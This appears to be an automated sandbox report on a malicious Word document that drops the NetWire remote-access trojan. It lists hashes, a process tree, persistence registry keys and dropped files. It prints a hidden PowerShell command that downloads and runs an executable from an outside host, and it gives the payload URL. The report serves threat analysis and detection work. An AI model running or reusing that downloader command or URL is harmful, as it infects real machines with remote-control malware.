Analysis
-
max time kernel
139s -
max time network
146s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-01-2021 09:17
Static task
static1
Behavioral task
behavioral1
Sample
Pokana2021011357.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Pokana2021011357.doc
Resource
win10v20201028
General
-
Target
Pokana2021011357.doc
-
Size
55KB
-
MD5
9a59fc2435737333486d786264c40542
-
SHA1
19ccdcf1cdafdd248080f7a0b4a481057125ebdf
-
SHA256
ca7d0cd170dc326645352637b21087e96576f33aafebcb59cb3ea28952d7214d
-
SHA512
eddb242b35355a91000d124a13bce5df1a929282f9ebf4554c261b14a1c473e75bf3c0d657f521b78d07e687ce26a749713a5aa9ffc908a53106b94744c69be5
Malware Config
Extracted
http://one.oziriss.club:2095/ol/o1.exe
Signatures
-
NetWire RAT payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1116-10-0x0000000000E40000-0x0000000000E70000-memory.dmp netwire behavioral2/memory/1116-11-0x0000000000E4242D-mapping.dmp netwire behavioral2/memory/1116-13-0x0000000000E40000-0x0000000000E70000-memory.dmp netwire behavioral2/memory/1232-18-0x00000000013C0000-0x00000000013F0000-memory.dmp netwire behavioral2/memory/1232-19-0x00000000013C242D-mapping.dmp netwire behavioral2/memory/1232-21-0x00000000013C0000-0x00000000013F0000-memory.dmp netwire -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2008 576 powershell.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 22 2008 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
secure.exesecure.exefers.exefers.exepid process 2916 secure.exe 1116 secure.exe 3292 fers.exe 1232 fers.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
fers.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ fers.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\fers = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\fers.exe" fers.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
secure.exefers.exedescription pid process target process PID 2916 set thread context of 1116 2916 secure.exe secure.exe PID 3292 set thread context of 1232 3292 fers.exe fers.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 576 WINWORD.EXE 576 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2008 powershell.exe 2008 powershell.exe 2008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2008 powershell.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
WINWORD.EXEpid process 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE 576 WINWORD.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WINWORD.EXEpowershell.exesecure.exesecure.exefers.exedescription pid process target process PID 576 wrote to memory of 2008 576 WINWORD.EXE powershell.exe PID 576 wrote to memory of 2008 576 WINWORD.EXE powershell.exe PID 2008 wrote to memory of 2916 2008 powershell.exe secure.exe PID 2008 wrote to memory of 2916 2008 powershell.exe secure.exe PID 2008 wrote to memory of 2916 2008 powershell.exe secure.exe PID 2916 wrote to memory of 1116 2916 secure.exe secure.exe PID 2916 wrote to memory of 1116 2916 secure.exe secure.exe PID 2916 wrote to memory of 1116 2916 secure.exe secure.exe PID 2916 wrote to memory of 1116 2916 secure.exe secure.exe PID 2916 wrote to memory of 1116 2916 secure.exe secure.exe PID 1116 wrote to memory of 3292 1116 secure.exe fers.exe PID 1116 wrote to memory of 3292 1116 secure.exe fers.exe PID 1116 wrote to memory of 3292 1116 secure.exe fers.exe PID 3292 wrote to memory of 1232 3292 fers.exe fers.exe PID 3292 wrote to memory of 1232 3292 fers.exe fers.exe PID 3292 wrote to memory of 1232 3292 fers.exe fers.exe PID 3292 wrote to memory of 1232 3292 fers.exe fers.exe PID 3292 wrote to memory of 1232 3292 fers.exe fers.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Pokana2021011357.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://one.oziriss.club:2095/ol/o1.exe',$env:Temp+'\secure.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\secure.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\secure.exe"C:\Users\Admin\AppData\Local\Temp\secure.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\secure.exeC:\Users\Admin\AppData\Local\Temp\secure.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeC:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Local\Temp\secure.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exeMD5
b61d866837ca60df01c1465e028db4c9
SHA153d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
SHA256b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
SHA512f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070
-
C:\Users\Admin\AppData\Roaming\trftkoxoicklgdxkctuphueti84738.pngMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/576-2-0x00007FFC303D0000-0x00007FFC30A07000-memory.dmpFilesize
6.2MB
-
memory/1116-10-0x0000000000E40000-0x0000000000E70000-memory.dmpFilesize
192KB
-
memory/1116-11-0x0000000000E4242D-mapping.dmp
-
memory/1116-13-0x0000000000E40000-0x0000000000E70000-memory.dmpFilesize
192KB
-
memory/1232-21-0x00000000013C0000-0x00000000013F0000-memory.dmpFilesize
192KB
-
memory/1232-19-0x00000000013C242D-mapping.dmp
-
memory/1232-18-0x00000000013C0000-0x00000000013F0000-memory.dmpFilesize
192KB
-
memory/2008-6-0x000002CA79FE0000-0x000002CA79FE1000-memory.dmpFilesize
4KB
-
memory/2008-4-0x00007FFC29BE0000-0x00007FFC2A5CC000-memory.dmpFilesize
9.9MB
-
memory/2008-5-0x000002CA79C30000-0x000002CA79C31000-memory.dmpFilesize
4KB
-
memory/2008-3-0x0000000000000000-mapping.dmp
-
memory/2916-7-0x0000000000000000-mapping.dmp
-
memory/3292-14-0x0000000000000000-mapping.dmp